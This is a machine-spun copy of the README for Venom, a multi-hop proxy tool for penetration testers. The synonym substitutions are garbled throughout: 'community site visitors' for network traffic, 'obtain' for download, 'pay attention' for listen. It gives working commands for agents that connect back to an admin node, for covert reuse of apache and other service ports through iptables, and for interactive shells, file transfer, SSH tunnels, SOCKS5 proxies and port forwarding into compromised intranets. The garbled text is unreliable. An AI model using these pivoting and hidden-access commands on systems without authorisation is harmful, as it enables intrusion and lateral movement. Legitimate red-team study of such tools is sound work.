Venom is a multi-hop proxy instrument developed for penetration testers utilizing Go.
You should use venom to simply proxy community site visitors to a multi-layer intranet, and simply handle intranet nodes.
Options
- community topology
- multi-hop socks5 proxy
- multi-hop port ahead
- port reuse (apache/mysql/…)
- ssh tunnel
- interactive shell
- add and obtain file
- helps a number of platforms(Linux/Home windows/MacOS) and a number of architectures(x86/x64/arm/mips)
Set up
You’ll be able to instantly obtain the executable information from https://github.com/Dliv3/Venom/releases
If you wish to compile the challenge from supply, you should set up go >= 1.11, then execute the next instructions.
go get -u github.com/Dliv3/Venom/…
# $GOPATH is the setting variable configured when Go is put in. It may be considered by the ‘go env’ command.
cd $GOPATH/src/github.com/Dliv3/Venom
# Compiled binary information are saved within the launch folder within the present listing.
./construct.sh
Utilization
1. admin/agent command line parameters
- Each the admin node and the agent node can act as a server or shopper.
Admin listens on the port 9999, the agent connects to the admin:
./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999
Agent listens on the port 8888, the admin connects to the agent:
./agent_linux_x64 -lport 8888
./admin_macos_x64 -rhost 192.168.204.139 -rport 8888
- The agent node helps port reuse.
Agent offers two port reuse strategies
- Port reuse through SO_REUSEPORT and SO_REUSEADDR choices
- Port reuse through iptables (Linux platform solely)
The ports of most providers may be reused on linux.
The ports of providers resembling apache and mysql may be reused on Home windows, and the ports of RDP, IIS, and so on. can’t be reused quickly.
The reused port can nonetheless present its unique service usually.
The primary port reuse methodology
# Apache beneath home windows setting:
# Reuse apache 80 port, doesn’t have an effect on apache to supply regular http service
# The worth of -h is the native ip, and cannot be 0.0.0.0. In any other case, port reuse can’t be carried out.
./agent.exe -lhost 192.168.204.139 -reuse-port 80
./admin_macos_x64 -rhost 192.168.204.139 -rport 80
The second port reuse methodology
# Apache beneath linux setting:
# Requires root privileges
sudo ./agent_linux_x64 -lport 8080 -reuse-port 80
This methodology will add the iptables guidelines, iptables forwards the site visitors of the reuse-port to the lport, after which distribute the site visitors by the agent.
One factor to notice is that if the sigterm or sigint ends the agent (kill or ctrl-c), the agent will routinely clear up the iptables guidelines. If the agent is killed by kill -9, the iptables rule can’t be routinely cleaned up and must be cleaned manually as a result of the agent program can not cope with the sigkill sign.
With a view to forestall the iptables guidelines from being routinely cleaned up and the penetration tester can not entry the 80-port service, the second port reuse methodology makes use of iptables -m current to manage whether or not the iptables forwarding guidelines are enabled via particular tcp packets.
# Begin the iptables port reuse guidelines set by the agent on the linux host
# If rhost is on the intranet, you need to use the socks5 to proxy site visitors. See the next for the usage of the socks5 proxy.
python scripts/port_reuse.py –start –rhost 192.168.204.135 –rport 80
# Connect with the agent
./admin_macos_x64 -rhost 192.168.204.135 -rport 80
# If you wish to flip off iptables port reuse guidelines
python scripts/port_reuse.py –stop –rhost 192.168.204.135 –rport 80
2. admin node built-in instructions
- assist (Print assist data)
(admin node) >>> assist
assist Assist data.
exit Exit.
present Show community topology.
getdes View description of the goal node.
setdes [info] Add an outline to the goal node.
goto [id] Choose id because the goal node.
pay attention [lport] Pay attention on a port on the goal node.
join [rhost] [rport] Connect with a brand new node via the goal node.
sshconnect [[email protected]:port] [dport] Connect with a brand new node via ssh tunnel.
shell Begin an interactive shell on the goal node.
add [local_file] [remote_file] Add information to the goal node.
obtain [remote_file] [local_file] Obtain information from the goal node.
socks [lport] Begin a socks5 server.
lforward [lhost] [sport] [dport] Ahead a neighborhood sport to a distant dport.
rforward [rhost] [sport] [dport] Ahead a distant sport to a neighborhood dport.
- present (Show community topology)
The letter ‘A’ represents the admin node, and the quantity represents the agent node.
The next topology diagram exhibits that node1 connects to the admin node, node2 and node4 hook up with 1 node, and node3 connects to node2.
(node 1) >>> present
A
+ — 1
+ — 2
+ — 3
+ — 4
Be aware that to function on a newly joined node, first run the present command on the admin node to synchronize the community topology and node quantity.
- goto (You wish to function a node)
(admin node) >>> goto 1
(node 1) >>>
After going to a node, you need to use the instructions that will likely be described under.
- getdes/setdes (Get/set node data description)
(node 1) >>> setdes linux x64 blahblahblah
(node 1) >>> getdes
linux x64 blahblahblah
- join/pay attention/sshconnect (Join to a different node/Settle for connections from different nodes)
Node1 connects to port 9999 of 192.168.0.103.
(node 1) >>> join 192.168.0.103 9999
hook up with 192.168.0.103 9999
efficiently hook up with the distant port!
(node 1) >>> present
A
+ — 1
+ — 2
Listening to port 9997 on the node1. Then run ./agent_linux_x64 -rhost 192.168.204.139 -rport 9997 on one other machine to hook up with node1.
(node 1) >>> pay attention 9997
pay attention 9997
the port 9997 is efficiently listening on the distant node!
(node 1) >>> present
A
+ — 1
+ — 2
+ — 3
Execute ./agent_linux_x64 -lport 9999 on 192.168.0.104, then node3 connects to port 9998 of 192.168.0.104 via the ssh tunnel utilizing sshconnect command. You should use ssh or personal key for ssh authentication.
(node 1) >>> goto 3
(node 3) >>> sshconnect [email protected]:22 9999
use password (1) / ssh key (2)? 2
file path of ssh key: /Customers/dlive/.ssh/id_rsa
join to focus on host’s 9999 via ssh tunnel ([email protected]:22).
ssh efficiently connects to the distant node!
(node 3) >>> present
A
+ — 1
+ — 2
+ — 3
+ — 4
- shell (Get an interactive shell of the goal node)
(node 1) >>> shell
You’ll be able to execute instructions on this shell :D, ‘exit’ to exit.
bash: no job management on this shell
bash-3.2$ whoami
whoami
dlive
bash-3.2$ exit
exit
exit
- add/obtain (Add/obtain information from the goal node)
Add native /tmp/check.pdf to node1’s /tmp/test2.pdf
(node 1) >>> add /tmp/check.pdf /tmp/test2.pdf
add /tmp/check.pdf to /tmp/test2.pdf
this file is just too massive(>100M), do you continue to wish to add it? (y/n)y
154.23 MiB / 154.23 MiB [========================================] 100.00% 1s
add file efficiently!
Obtain node1’s file /tmp/test2.pdf to your native /tmp/test3.pdf
(node 1) >>> obtain /tmp/test2.pdf /tmp/test3.pdf
obtain /tmp/test2.pdf from /tmp/test3.pdf
this file is just too massive(>100M), do you continue to wish to obtain it? (y/n)y
154.23 MiB / 154.23 MiB [========================================] 100.00% 1s
obtain file efficiently!
- socks (Set up a socks5 proxy on the goal node)
(node 1) >>> socks 7777
a socks5 proxy of the goal node has began up on native port 7777
After executing the socks command, a port will likely be opened regionally on the admin node, resembling 7777 above, utilizing 7777 to carry out the socks5 proxy.
- lforward/rforward (Ahead native port to distant / ahead distant port to native)
Lforward forwards the native 8888 port of the admin node to the 8888 port of node1.
(node 1) >>> lforward 127.0.0.1 8888 8888
ahead native community 127.0.0.1 port 8888 to distant port 8888
Rforward forwards the 192.168.204.103 port 8889 of the node1 community to the native 8889 port of the admin node.
(node 1) >>> rforward 192.168.204.103 8889 8889
ahead distant community 192.168.204.103 port 8889 to native port 8889
3. consideration
- Just one admin node is supported at this stage to handle the community.
- To function on a newly joined node, first run the present command on the admin node to synchronize the community topology and node quantity.
- When utilizing the second port reuse methodology (primarily based on iptables), you should use script/port_reuse.py to allow the port reuse guidelines set by the agent on the goal host.
TODO
- mixed with regeorg
- a number of administrator nodes
- community site visitors encryption
- help socks5 udp
- RESTful API
- mixed with meterpreter (to be mentioned)